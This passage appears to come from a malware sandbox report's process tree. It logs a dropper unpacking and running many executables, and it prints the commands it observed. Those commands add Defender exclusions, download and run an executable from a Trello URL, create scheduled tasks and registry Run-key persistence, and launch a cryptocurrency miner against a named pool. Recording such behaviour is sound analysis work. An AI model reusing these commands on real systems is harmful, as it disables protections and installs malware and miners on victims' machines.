        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        30⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        31⤵
        
        PID:8016
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        32⤵
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        33⤵
        
        PID:2072
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        34⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        35⤵
        
        PID:5176
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        36⤵
        
        PID:6892
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        37⤵
        
        PID:5968
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        38⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        39⤵
        
        PID:2788
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        40⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        41⤵
        
        PID:7708
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        42⤵
        
        PID:6488
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        43⤵
        
        PID:7632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        44⤵
        
        PID:2604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        44⤵
        
        PID:6576
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\XClient.exe"
      4⤵
      PID:5628
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\XClient.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\XClient.exe
        5⤵
        
        PID:4708
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe"
      4⤵
      PID:6308
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\file.exe
        5⤵
        
        PID:4396
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\run.vbs"
        6⤵
        
        PID:4828
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe"
        7⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\update.exe
        8⤵
        
        PID:6428
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe"
        7⤵
        
        PID:6392
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\setup.exe
        8⤵
        
        PID:4344
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE"
      4⤵
      PID:2384
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
        5⤵
        
        PID:6496
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1BZ7KF~1.EXE"
      4⤵
      PID:6644
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1BZ7KF~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1BZ7KF~1.EXE
        5⤵
        
        PID:284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
        6⤵
        
        PID:4856
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
        7⤵
        Creates scheduled task(s)
        
        PID:6932
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
        6⤵
        
        PID:7920
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
        7⤵
        Creates scheduled task(s)
        
        PID:2272
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
        6⤵
        
        PID:2608
        
        C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
        7⤵
        Creates scheduled task(s)
        
        PID:5012
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe"
      4⤵
      PID:8096
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        5⤵
        
        PID:7392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4463.tmp.bat""
        6⤵
        
        PID:5596
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2076
        
        C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        
        PID:4000
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        8⤵
        
        PID:8168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        9⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        10⤵
        Creates scheduled task(s)
        
        PID:8040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        8⤵
        
        PID:5604
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe"
      4⤵
      PID:788
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe
        5⤵
        
        PID:8056
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        6⤵
        
        PID:4832
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
        6⤵
        
        PID:3344
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE"
      4⤵
      PID:7888
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE
        5⤵
        
        PID:6240
      - C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
        6⤵
        
        PID:4352
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE"
      4⤵
      PID:5140
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        5⤵
        
        PID:4316
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DISABL~1.EXE
        6⤵
        
        PID:6528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c pause
        7⤵
        
        PID:6724
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe"
      4⤵
      PID:948
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asdfg.exe
        5⤵
        
        PID:2792
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dsdasda.exe"
      4⤵
      PID:5156
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dsdasda.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dsdasda.exe
        5⤵
        
        PID:7728
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2208
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 928
        7⤵
        Program crash
        
        PID:5584
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE"
      4⤵
      PID:3260
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        5⤵
        
        PID:712
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:7592
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE"
      4⤵
      PID:5936
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        5⤵
        
        PID:7568
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
        6⤵
        
        PID:4400
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\POOLSD~1.EXE"
      4⤵
      PID:4032
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\POOLSD~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\POOLSD~1.EXE
        5⤵
        
        PID:7416
      - C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
        
        C:\Users\Admin\AppData\Local\Temp\Updatemonitor\livecall.exe
        6⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe
        
        "C:\Users\Admin\AppData\Roaming\Updatemonitor\livecall.exe"
        7⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        
        PID:4856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        9⤵
        
        PID:6676
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe"
      4⤵
      PID:6136
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        5⤵
        
        PID:6424
      - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        6⤵
        
        PID:4696
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup1.exe"
      4⤵
      PID:7948
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup1.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup1.exe
        5⤵
        
        PID:3532
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2Q40~1.EXE"
        6⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Local\Temp\U2Q40~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2Q40~1.EXE
        7⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 1020
        8⤵
        Program crash
        
        PID:6556
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U2Q41~1.EXE"
        6⤵
        
        PID:7184
        
        C:\Users\Admin\AppData\Local\Temp\U2Q41~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U2Q41~1.EXE
        7⤵
        
        PID:6952
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 1560
        6⤵
        Program crash
        
        PID:3372
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup3.exe"
      4⤵
      PID:2244
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup3.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup3.exe
        5⤵
        
        PID:4340
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3CK0~1.EXE"
        6⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\U3CK0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3CK0~1.EXE
        7⤵
        
        PID:7896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7896 -s 1192
        8⤵
        Program crash
        
        PID:3200
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3CK1~1.EXE"
        6⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\U3CK1~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3CK1~1.EXE
        7⤵
        
        PID:5096
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1460
        6⤵
        Program crash
        
        PID:7220
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe"
      4⤵
      PID:7320
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TeamFour.exe
        5⤵
        
        PID:5584
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE"
      4⤵
      PID:7088
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ECHONA~1.EXE
        5⤵
        
        PID:884
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
        6⤵
        
        PID:5000
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEX12~1.EXE"
      4⤵
      PID:7184
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEX12~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEX12~1.EXE
        5⤵
        
        PID:4968
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe"
      4⤵
      PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        5⤵
        
        PID:7884
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe"
      4⤵
      PID:7296
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        5⤵
        
        PID:1104
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe
        6⤵
        
        PID:6356
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe"
      4⤵
      PID:5612
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Max.exe
        5⤵
        
        PID:2680
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DRIVEA~1.EXE"
      4⤵
      PID:7516
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe"
      4⤵
      PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Point.exe
        5⤵
        
        PID:6364
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe"
      4⤵
      PID:2184
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe
        5⤵
        
        PID:7940
      - C:\Users\Admin\AppData\Local\Temp\1145827700.exe
        
        C:\Users\Admin\AppData\Local\Temp\1145827700.exe
        6⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\253249181.exe
        
        C:\Users\Admin\AppData\Local\Temp\253249181.exe
        7⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\1847117467.exe
        
        C:\Users\Admin\AppData\Local\Temp\1847117467.exe
        8⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\232218895.exe
        
        C:\Users\Admin\AppData\Local\Temp\232218895.exe
        8⤵
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\2440133610.exe
        
        C:\Users\Admin\AppData\Local\Temp\2440133610.exe
        8⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\2359214336.exe
        
        C:\Users\Admin\AppData\Local\Temp\2359214336.exe
        8⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\3153724139.exe
        
        C:\Users\Admin\AppData\Local\Temp\3153724139.exe
        7⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\679217445.exe
        
        C:\Users\Admin\AppData\Local\Temp\679217445.exe
        7⤵
        
        PID:6300
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe"
      4⤵
      PID:7836
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe
        5⤵
        
        PID:2848
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 1224
        6⤵
        Program crash
        
        PID:8156
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\cccc.exe"
      4⤵
      PID:2820
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\cccc.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\cccc.exe
        5⤵
        
        PID:3084
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
        6⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
        7⤵
        
        PID:6572
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\228.exe"
      4⤵
      PID:2252
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\228.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\228.exe
        5⤵
        
        PID:7188
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\H667H.exe"
      4⤵
      PID:5820
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\H667H.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\H667H.exe
        5⤵
        
        PID:7216
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE"
      4⤵
      PID:8132
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GOLDPR~1.EXE
        5⤵
        
        PID:3528
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\chckik.exe"
      4⤵
      PID:5076
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
    "bot.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
      4⤵
      Executes dropped EXE
      PID:2132
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
        5⤵
        
        PID:4564
      - C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
        6⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
        7⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        
        C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
        8⤵
        
        PID:1076
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:5068
        
        C:\Program Files (x86)\Microsoft\DesktopLayer.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
        8⤵
        
        PID:5776
        
        C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
        
        "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
        9⤵
        
        PID:4120
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        10⤵
        
        PID:4408
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        9⤵
        
        PID:5396
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5396 CREDAT:17410 /prefetch:2
        10⤵
        
        PID:6524
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A795.tmp\splitterrypted.vbs
        7⤵
        
        PID:4332
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\A795.tmp\splitterrypted.vbs
        8⤵
        
        PID:4120
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
        5⤵
        
        PID:1432
      - C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        
        C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
        6⤵
        
        PID:1324
        
        C:\Windows\svchost.com
        
